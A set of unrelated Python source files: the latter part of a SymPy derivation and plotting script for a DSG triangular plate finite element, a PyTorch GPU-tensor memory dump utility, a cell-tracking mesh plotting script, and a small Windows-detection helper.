GX_u.subs([(PY1,-RX1),(PY2,-RX2),(PY3,-RX3),(PX1,RY1),(PX2,RY2),(PX3,RY3)]) #GY_u = GY_u.subs([(PY1,-RX1),(PY2,-RX2),(PY3,-RX3),(PX1,RY1),(PX2,RY2),(PX3,RY3)]) # Jacobian entries dxi_dx = c/detJ deta_dx = -b/detJ dxi_dy = -d/detJ deta_dy = a/detJ # ----------------------------------------------------------------------------- # Section 9 : Cartesian transformation # ----------------------------------------------------------------------------- # Big Cartesian transformation - I think this is incorrect #rmShearField_xi_u = sp.diff(GX_u,xi)*dxi_dx + sp.diff(GX_u,eta)*deta_dx + sp.diff(GY_u,xi)*dxi_dx + sp.diff(GY_u,eta)*deta_dx #rmShearField_eta_u = sp.diff(GY_u,xi)*dxi_dy + sp.diff(GY_u,eta)*deta_dy + sp.diff(GX_u,xi)*dxi_dy + sp.diff(GX_u,eta)*deta_dy # Cartesian transformation used in Original DSG derivation #rmShearField_xi_u = sp.diff(GX_u,xi)*c/detJ + sp.diff(GY_u,eta)*-b/detJ #rmShearField_eta_u = sp.diff(GY_u,eta)*a/detJ + sp.diff(GX_u,xi)*-d/detJ # Parametric only differentiation rmShearField_xi_u = sp.diff(GX_u,xi) rmShearField_eta_u = sp.diff(GY_u,eta) print("\ parametric only rmShearField_xi_u = ",rmShearField_xi_u) print("\ parametric only rmShearField_eta_u = ",rmShearField_eta_u) # ----------------------------------------------------------------------------- # Section 10 : Print out results # ----------------------------------------------------------------------------- print("\n\n\nSymbolic B Matrix ( transformed to cartesian ) (1/detJ taken out) = ") # Assemble B Matrix ------------------------------------------ B = sp.zeros(2,9) for col in range(9): B[0,col] = sp.diff(rmShearField_xi_u,UVector[col]) B[1,col] = sp.diff(rmShearField_eta_u,UVector[col]) sp.pprint(sp.simplify(B),wrap_line=False) # ----------------------------------------------------------------------------- # Section 11 : Solve example problem # ----------------------------------------------------------------------------- disps = sp.zeros(9,1) disps[0] = 0.5 # disps[1] = 1.0 # disps[2] = 0.5 # disps[3] = 1.0 # disps[4] = -2.0 #solved for disps[5] = 1.5 disps[6] = 1.0 # disps[7] = 1.5 #solved for disps[8] = -1.0 #solved for C = sp.zeros(2,2) E = 1000 G = E/2.0 #poisson = 0.0 h = 0.05 C[0,0] = 1 C[1,1] = 1 C *= G*5.0/6.0*h K = B.T * C * B K1 = sp.integrate(K,(eta,0.0,1.0-xi)) Kint = sp.integrate(K1,(xi,0.0,1.0)) print("\n\nCartesian stiffness matrix integrated symbolically:") sp.pprint(sp.N(Kint,3),wrap_line=False) #setup reduced system and get rid of prescribed displacements redK = sp.zeros(3,3) redF = sp.zeros(3,1) displacedDOFs = [1,2,3,4,6,7] #dof number, not index freeDOFs = [5,8,9] #dof number, not index for DOFrowcheck in range(len(freeDOFs)): tempF = 0.0 row = freeDOFs[DOFrowcheck] - 1 for DOFcolcheck in range(len(displacedDOFs)): col = displacedDOFs[DOFcolcheck] - 1 tempF += Kint[row,col] * disps[col] redF[DOFrowcheck] = 0.0 - tempF for row in range(len(freeDOFs)): for col in range(len(freeDOFs)): redK[row,col] = Kint[freeDOFs[row]-1,freeDOFs[col]-1] solvedDisps = (redK**-1)*redF print("\nSolved displacements:") sp.pprint(solvedDisps) BletzyResults = sp.zeros(3,1) BletzyResults[0] = -2.0 BletzyResults[1] = 1.5 BletzyResults[2] = -1.0 print("\nBletzinger's displacements:") sp.pprint(BletzyResults) print("\n\n\n=====================================================================\n") print("\tNOW RE-RUNNING PROBLEM INCLUDING BENDING FORMULATION") print("\n=====================================================================\n") #Bletzinger maple worksheet DOF order maintained here B_bend_and_shear = sp.zeros(5,9) a = xi2 - xi1 b = eta2 - eta1 c = eta3 - eta1 d = xi3 - xi1 #Add in bending B matrix from DSG, re-arranged for maple DOF ordering #phix's B_bend_and_shear[0,3] = b-c B_bend_and_shear[1,3] = 0.0 B_bend_and_shear[2,3] = d-a B_bend_and_shear[0,4] = c B_bend_and_shear[1,4] = 0.0 B_bend_and_shear[2,4] = -d B_bend_and_shear[0,5] = -b B_bend_and_shear[1,5] = 0.0 B_bend_and_shear[2,5] = a #phiy's B_bend_and_shear[0,6] = 0.0 B_bend_and_shear[1,6] = d-a B_bend_and_shear[2,6] = b-c B_bend_and_shear[0,7] = 0.0 B_bend_and_shear[1,7] = -d B_bend_and_shear[2,7] = c B_bend_and_shear[0,8] = 0.0 B_bend_and_shear[1,8] = a B_bend_and_shear[2,8] = -b area = 1.0*1.0/2.0 B_bend_and_shear /= (2.0*area) #divide bending part of Bmat by detJ #Copy in shear B matrix, already calculated above, no scaling needed for row in range(2): for col in range(9): B_bend_and_shear[3+row,col] = B[row,col] # Setup combined material matrix C_bend_and_shear = sp.zeros(5,5) C_bend_and_shear[0,0] = 1.0 C_bend_and_shear[1,1] = 1.0 C_bend_and_shear[0,1] = 0.0 C_bend_and_shear[1,0] = 0.0 C_bend_and_shear[2,2] = (1.0-0.0)/2.0 C_bend_and_shear *= (E*h**3/(12)) for row in range(2): for col in range(2): C_bend_and_shear[3+row,3+col] = C[row,col] #Calc combined K K_temp3 = B_bend_and_shear.T * C_bend_and_shear * B_bend_and_shear Ktemp1 = sp.integrate(K_temp3,(eta,0.0,1.0-xi)) K_bend_and_shear = sp.integrate(Ktemp1,(xi,0.0,1.0)) print("\n\nCombined stiffness matrix :") sp.pprint(sp.N(K_bend_and_shear,3),wrap_line=False) #setup reduced system and get rid of prescribed displacements for DOFrowcheck in range(len(freeDOFs)): tempF = 0.0 row = freeDOFs[DOFrowcheck] - 1 for DOFcolcheck in range(len(displacedDOFs)): col = displacedDOFs[DOFcolcheck] - 1 tempF += K_bend_and_shear[row,col] * disps[col] redF[DOFrowcheck] = 0.0 - tempF for row in range(len(freeDOFs)): for col in range(len(freeDOFs)): redK[row,col] = K_bend_and_shear[freeDOFs[row]-1,freeDOFs[col]-1] solvedDisps = (redK**-1)*redF print("\nSolved displacements:") sp.pprint(solvedDisps) # ----------------------------------------------------------------------------- # Section 12 : Plot results # ----------------------------------------------------------------------------- print('\n\n\n\ntotal displacement vector = ') for i in range(9): print(disps[i]) shearGapField_u = shearGapField_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nshearGapField_u = ',shearGapField_u) kirchhoffDispField_u = kirchhoffDispField_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nkirchhoffDispField_u = ',kirchhoffDispField_u) rmDispField_u = rmDispField_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nrmDispField_u = ',rmDispField_u) moderatorDispField_u=moderatorDispField_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nmoderatorDispField_u = ',moderatorDispField_u) rmShearField_xi_u = rmShearField_xi_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nrmShearField_xi_u = ',rmShearField_xi_u) kirchhoffShearField_xi_u = kirchhoffShearField_xi.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) kirchhoffShearField_xi_u = kirchhoffShearField_xi_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nkirchhoffShearField_xi_u = ',kirchhoffShearField_xi_u) kirchhoffShearField_eta_u = kirchhoffShearField_eta.subs([(a1,ansatzCoefficients[0]),(a2,ansatzCoefficients[1]),(a3,ansatzCoefficients[2]),(a4,ansatzCoefficients[3]),(a5,ansatzCoefficients[4]),(a6,ansatzCoefficients[5]),(a7,ansatzCoefficients[6]),(a8,ansatzCoefficients[7]),(a9,ansatzCoefficients[8])]) kirchhoffShearField_eta_u = kirchhoffShearField_eta_u.subs([(W1,disps[0]),(W2,disps[1]),(W3,disps[2]),(PX1,disps[3]),(PX2,disps[4]),(PX3,disps[5]),(PY1,disps[6]),(PY2,disps[7]),(PY3,disps[8])]) print('\n\nkirchhoffShearField_eta_u = ',kirchhoffShearField_eta_u) divisions = 25 u = np.linspace(0, 1, divisions) v = np.linspace(1, 0, divisions) x_mesh = np.outer(np.ones_like(u), v) y_mesh = np.outer(v, u) divisions = 25 u = np.linspace(0, 1, divisions) v = np.linspace(1, 0, divisions) x = np.outer(np.ones_like(u), v) y = np.outer(v, u) #cm.coolwarm fig = plt.figure(1) # shearGapField_u z = 1.0*y**2 - 0.5*y*x - 1.0*y + 1.5*x**2 - 1.0*x + 0.5 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlabel('shearGapField_u',fontsize=myfontsize) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([0, 0.25, 0.5, 0.75, 1]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(0, 1) surf.set_clim(vmin=0, vmax=1) fig.colorbar(surf, shrink=0.75, aspect=20) plt.title('Displacement gap field') plt.savefig('displacement_gap_field.pdf',bbox_inches="tight") ax.elev = 89 ax.azim = -90 ax.w_zaxis.line.set_lw(0.) ax.set_zticks([]) plt.savefig('displacement_gap_field_90.pdf',bbox_inches="tight") fig = plt.figure(2) # kirchhoffDispField_u z = -1.0*y**2 + 0.5*y*x + 1.0*y - 1.5*x**2 + 1.0*x - 0.5 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlim(-1.01, 1.01) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([-1, -0.75, -0.5, -0.25, 0]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-1, 0) surf.set_clim(vmin=-1, vmax=0) fig.colorbar(surf, shrink=0.75, aspect=20) plt.title('KT displacement field') plt.savefig('kt_displacement_field.pdf',bbox_inches="tight") ax.elev = 89 ax.azim = -90 ax.w_zaxis.line.set_lw(0.) ax.set_zticks([]) plt.savefig('kt_displacement_field_90.pdf',bbox_inches="tight") fig = plt.figure(3) # rmDispField_u z = 0.0 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlim(-1.01, 1.01) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([-1, 0, 1]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-1, 1) surf.set_clim(vmin=-1, vmax=1) fig.colorbar(surf, shrink=0.75, aspect=20) plt.title('RM shear-displacement field') plt.savefig('rm_shear_disp_field.pdf',bbox_inches="tight") #ax.elev = 89 #ax.azim = -90 #ax.w_zaxis.line.set_lw(0.) #ax.set_zticks([]) #plt.savefig('rm_shear_disp_field_90.pdf',bbox_inches="tight") fig = plt.figure(4) # addition of fields z = 1.0*y**2 - 0.5*y*x - 1.0*y + 1.5*x**2 - 1.0*x + 0.5 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf1 = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) z = -1.0*y**2 + 0.5*y*x + 1.0*y - 1.5*x**2 + 1.0*x - 0.5 ax = fig.gca(projection='3d') surf2 = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) z = 0.0 ax = fig.gca(projection='3d') surf3 = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([-1, -0.5, 0, 0.5, 1]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-1, 1) #fig.colorbar(surf1, shrink=1, aspect=10) surf1.set_clim(vmin=-1, vmax=1) surf2.set_clim(vmin=-1, vmax=1) surf3.set_clim(vmin=-1, vmax=1) fig.colorbar(surf, shrink=0.75, aspect=20) plt.title('Displacement gap + KT = RM shear-displacement') plt.savefig('sum.pdf',bbox_inches="tight") #ax.elev = 89 #ax.azim = -90 #ax.w_zaxis.line.set_lw(0.) #ax.set_zticks([]) #plt.savefig('sum_90.pdf',bbox_inches="tight") fig = plt.figure(5) # kirchhoffShearField_xi_u z = 0.5*y - 3.0*x + 1.0 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlim(-1.01, 1.01) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zticks([-2, -1.5, -1, -0.5, 0, 0.5, 1 ,1.5]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-2, 1.5) surf.set_clim(vmin=-2, vmax=1.5) fig.colorbar(surf, shrink=0.75, aspect=20) ax.set_zlim(-2, 1.5) surf.set_clim(vmin=-2, vmax=1.5) plt.title('Rotation xi field') plt.savefig('rotation_xi.pdf',bbox_inches="tight") ax.elev = 89 ax.azim = -90 ax.w_zaxis.line.set_lw(0.) ax.set_zticks([]) plt.savefig('rotation_xi_90.pdf',bbox_inches="tight") fig = plt.figure(6) # kirchhoffShearField_eta_u z = -2.0*y + 0.5*x + 1.0 ax = fig.gca(projection='3d') ax.plot_wireframe(x_mesh,y_mesh,0.0) surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet, linewidth=0, antialiased=True) #ax.set_zlim(-1.01, 1.01) ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) ax.set_zlim(-1, 1.5) surf.set_clim(vmin=-1, vmax=1.5) fig.colorbar(surf, shrink=0.75, aspect=20) ax.set_zticks([-1, -0.5, 0, 0.5, 1 ,1.5]) plt.xlabel('xi') plt.ylabel('eta') ax.set_zlim(-1, 1.5) surf.set_clim(vmin=-1, vmax=1.5) plt.title('Rotation eta field') plt.savefig('rotation_eta.pdf',bbox_inches="tight") ax.elev = 89 ax.azim = -90 ax.w_zaxis.line.set_lw(0.) ax.set_zticks([]) plt.savefig('rotation_eta_90.pdf',bbox_inches="tight") plt.show()

# -*- coding: utf-8 -*- """ Created on Tue Oct 27 05:55:29 2020 @author: cupertino_user """ import torch import gc #del variables #gc.collect() #torch.cuda.memory_summary(device="cuda:1", abbreviated=False) def pretty_size(size): """Pretty prints a torch.Size object""" assert(isinstance(size, torch.Size)) return " × ".join(map(str, size)) def dump_tensors(gpu_only=True): """Prints a list of the Tensors being tracked by the garbage collector.""" total_size = 0 for obj in gc.get_objects(): try: if torch.is_tensor(obj): if not gpu_only or obj.is_cuda: print("%s:%s%s %s" % (type(obj).__name__, " GPU" if obj.is_cuda else "", " pinned" if obj.is_pinned else "", pretty_size(obj.size()))) total_size += obj.numel() elif hasattr(obj, "data") and torch.is_tensor(obj.data): if not gpu_only or obj.is_cuda: print("%s → %s:%s%s%s%s %s" % (type(obj).__name__, type(obj.data).__name__, " GPU" if obj.is_cuda else "", " pinned" if obj.data.is_pinned else "", " grad" if obj.requires_grad else "", " volatile" if obj.volatile else "", pretty_size(obj.data.size()))) total_size += obj.data.numel() except Exception as e: pass print("Total size:", total_size) torch.cuda.empty_cache() gc.collect() dump_tensors(True)

# Copyright 2016 Jochen Kursawe. See the LICENSE file at the top-level directory # of this distribution and at https://github.com/kursawe/MCSTracker/blob/master/LICENSE. import tracking import networkx as nx import matplotlib as mpl import matplotlib.pyplot as plt from os import path from os.path import dirname import sys import copy def make_initial_mapping_plot(): # print 'I am printing' # mesh_sequence = mesh.read_sequence_from_data(path.join(dirname(__file__),'..','..','..', # 'test','test_on_data', # 'data','first_few_frames')) # # first_mesh = mesh_sequence[0] # # second_mesh = mesh_sequence[1] sys.setrecursionlimit(40000) first_mesh = mesh.creation.generate_random_tesselation(9,9) second_mesh = copy.deepcopy(first_mesh) first_mesh.assign_frame_ids_in_order() second_mesh.assign_frame_ids_randomly() first_mesh.save(path.join(dirname(__file__),'first_mesh.mesh')) second_mesh.save(path.join(dirname(__file__),'second_mesh.mesh')) subgraph_finder = tracking.LocalisedSubgraphFinder(first_mesh, second_mesh) initial_tracking_state = subgraph_finder.create_starting_tracking_state() cell_id_in_first_mesh = initial_tracking_state.id_map.keys()[0] cell_id_in_second_mesh = initial_tracking_state.id_map.values()[0] neighbours_in_first_mesh = nx.single_source_shortest_path_length(subgraph_finder.network_one, cell_id_in_first_mesh, cutoff=2 ).keys() neighbours_in_second_mesh = nx.single_source_shortest_path_length(subgraph_finder.network_two, cell_id_in_second_mesh, cutoff=2 ).keys() first_mesh_polygon_list = [] for element in first_mesh.elements: this_polygon = mpl.patches.Polygon([node.position for node in element.nodes], fill = True) if element.id_in_frame in neighbours_in_first_mesh: this_polygon.set_facecolor('lightgrey') if element.id_in_frame == cell_id_in_first_mesh: this_polygon.set_facecolor('blue') else: this_polygon.set_facecolor([1.0, 1.0, 1.0]) first_mesh_polygon_list.append(this_polygon) first_mesh_polygon_collection = mpl.collections.PatchCollection(first_mesh_polygon_list, match_original = True) first_mesh_figure = plt.figure() first_mesh_figure.gca().add_collection(first_mesh_polygon_collection) first_mesh_figure.gca().set_aspect('equal') first_mesh_figure.gca().autoscale_view() plt.axis('off') first_mesh_figure.savefig('first_mesh.pdf', bbox_inches = 'tight') plt.close(first_mesh_figure) second_mesh_polygon_list = [] for element in second_mesh.elements: this_polygon = mpl.patches.Polygon([node.position for node in element.nodes], fill = True) if element.id_in_frame in neighbours_in_second_mesh: this_polygon.set_facecolor('lightgrey') if element.id_in_frame == cell_id_in_second_mesh: this_polygon.set_facecolor('blue') else: this_polygon.set_facecolor([1.0, 1.0, 1.0]) second_mesh_polygon_list.append(this_polygon) second_mesh_polygon_collection = mpl.collections.PatchCollection(second_mesh_polygon_list, match_original = True) second_mesh_figure = plt.figure() second_mesh_figure.gca().add_collection(second_mesh_polygon_collection) second_mesh_figure.gca().set_aspect('equal') second_mesh_figure.gca().autoscale_view() plt.axis('off') second_mesh_figure.savefig('second_mesh.pdf', bbox_inches = 'tight') plt.close(second_mesh_figure) if __name__=="__main__": print 'I am printing, too' make_initial_mapping_plot()

import sys import platform # https://stackoverflow.com/a/22820100 def is_windows(): return any(platform.win32_ver())